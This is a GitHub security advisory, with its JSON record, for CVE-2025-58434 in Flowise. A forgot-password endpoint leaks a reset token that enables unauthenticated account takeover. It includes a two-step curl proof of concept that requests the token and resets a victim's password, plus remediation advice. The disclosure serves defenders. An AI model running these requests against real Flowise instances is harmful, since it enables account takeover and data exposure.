ghsa-wgpv-6j63-x5ph
Vulnerability from github
Published
2025-09-12 20:02
Modified
2025-09-15 15:31
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover
Details

Summary

The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).

This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.

CVSS v3.1 Base Score: 9.8 (Critical) Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

  • The endpoint /api/v1/account/forgot-password accepts an email address as input.

  • Instead of only sending a reset email, the API responds directly with sensitive user details, including:

  • User ID, name, email, hashed credential, status, timestamps.

  • A valid tempToken and its expiry, which is intended for password reset.
  • This tempToken can then be reused immediately in the /api/v1/account/reset-password endpoint to reset the password of the targeted account without any email verification or user interaction.
  • Exploitation requires only the victim’s email address, which is often guessable or discoverable.
  • Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.

PoC

  1. Request a reset token for the victim

bash curl -i -X POST https://<target>/api/v1/account/forgot-password \ -H "Content-Type: application/json" \ -d '{"user":{"email":"<victim@example.com>"}}'

Response (201 Created):

json { "user": { "id": "<redacted-uuid>", "name": "<redacted>", "email": "<victim@example.com>", "credential": "<redacted-hash>", "tempToken": "<redacted-tempToken>", "tokenExpiry": "2025-08-19T13:00:33.834Z", "status": "active" } }

  1. Use the exposed tempToken to reset the password

bash curl -i -X POST https://<target>/api/v1/account/reset-password \ -H "Content-Type: application/json" \ -d '{ "user":{ "email":"<victim@example.com>", "tempToken":"<redacted-tempToken>", "password":"NewSecurePassword123!" } }'

Expected Result: 200 OK The victim’s account password is reset, allowing full login.

Impact

  • Type: Authentication bypass / Insecure direct object exposure.

  • Impact:

  • Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.

  • Applies to both Flowise Cloud and locally hosted/self-managed deployments.
  • Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
  • High likelihood of exploitation since no prior access or user interaction is required.

Recommended Remediation

  • Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
  • Ensure forgot-password responds with a generic success message regardless of input, to avoid user enumeration.
  • Require strong validation of the tempToken (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
  • Apply the same fixes to both cloud and self-hosted/local deployments.
  • Log and monitor password reset requests for suspicious activity.
  • Consider multi-factor verification for sensitive accounts.

Credit

⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).

Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58434"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-12T20:02:40Z",
    "nvd_published_at": "2025-09-12T18:15:34Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete **account takeover (ATO)**.\n\nThis vulnerability applies to **both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments** that expose the same API.\n\n**CVSS v3.1 Base Score:** **9.8 (Critical)**\n**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\n\n---\n\n### Details\n\n* The endpoint `/api/v1/account/forgot-password` accepts an email address as input.\n* Instead of only sending a reset email, the API **responds directly with sensitive user details**, including:\n\n  * User ID, name, email, hashed credential, status, timestamps.\n  * **A valid `tempToken` and its expiry**, which is intended for password reset.\n* This `tempToken` can then be reused immediately in the `/api/v1/account/reset-password` endpoint to reset the password of the targeted account **without any email verification** or user interaction.\n* Exploitation requires only the victim\u2019s email address, which is often guessable or discoverable.\n* Because the vulnerable endpoints exist in both **Flowise Cloud** and **local/self-hosted deployments**, any exposed instance is vulnerable to account takeover.\n\nThis effectively allows any unauthenticated attacker to **take over arbitrary accounts** (including admin or privileged accounts) by requesting a reset for their email.\n\n---\n\n### PoC\n\n1. **Request a reset token for the victim**\n\n```bash\ncurl -i -X POST https://\u003ctarget\u003e/api/v1/account/forgot-password \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"user\":{\"email\":\"\u003cvictim@example.com\u003e\"}}\u0027\n```\n\n**Response (201 Created):**\n\n```json\n{\n  \"user\": {\n    \"id\": \"\u003credacted-uuid\u003e\",\n    \"name\": \"\u003credacted\u003e\",\n    \"email\": \"\u003cvictim@example.com\u003e\",\n    \"credential\": \"\u003credacted-hash\u003e\",\n    \"tempToken\": \"\u003credacted-tempToken\u003e\",\n    \"tokenExpiry\": \"2025-08-19T13:00:33.834Z\",\n    \"status\": \"active\"\n  }\n}\n```\n\n2. **Use the exposed `tempToken` to reset the password**\n\n```bash\ncurl -i -X POST https://\u003ctarget\u003e/api/v1/account/reset-password \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n        \"user\":{\n          \"email\":\"\u003cvictim@example.com\u003e\",\n          \"tempToken\":\"\u003credacted-tempToken\u003e\",\n          \"password\":\"NewSecurePassword123!\"\n        }\n      }\u0027\n```\n\n**Expected Result:** `200 OK`\nThe victim\u2019s account password is reset, allowing full login.\n\n---\n\n### Impact\n\n* **Type:** Authentication bypass / Insecure direct object exposure.\n* **Impact:**\n\n  * Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.\n  * Applies to **both Flowise Cloud and locally hosted/self-managed deployments**.\n  * Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.\n  * High likelihood of exploitation since no prior access or user interaction is required.\n\n---\n\n### Recommended Remediation\n\n* **Do not return reset tokens** or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.\n* Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration.\n* Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery).\n* Apply the same fixes to **both cloud and self-hosted/local deployments**.\n* Log and monitor password reset requests for suspicious activity.\n* Consider multi-factor verification for sensitive accounts.\n\n\nCredit\n\n---\n\n\u26a0\ufe0f This is a **Critical ATO vulnerability** because it allows attackers to compromise any account with only knowledge of an email address, and it applies to **all deployment models (cloud and local)**.\n\n---",
  "id": "GHSA-wgpv-6j63-x5ph",
  "modified": "2025-09-15T15:31:14Z",
  "published": "2025-09-12T20:02:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58434"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.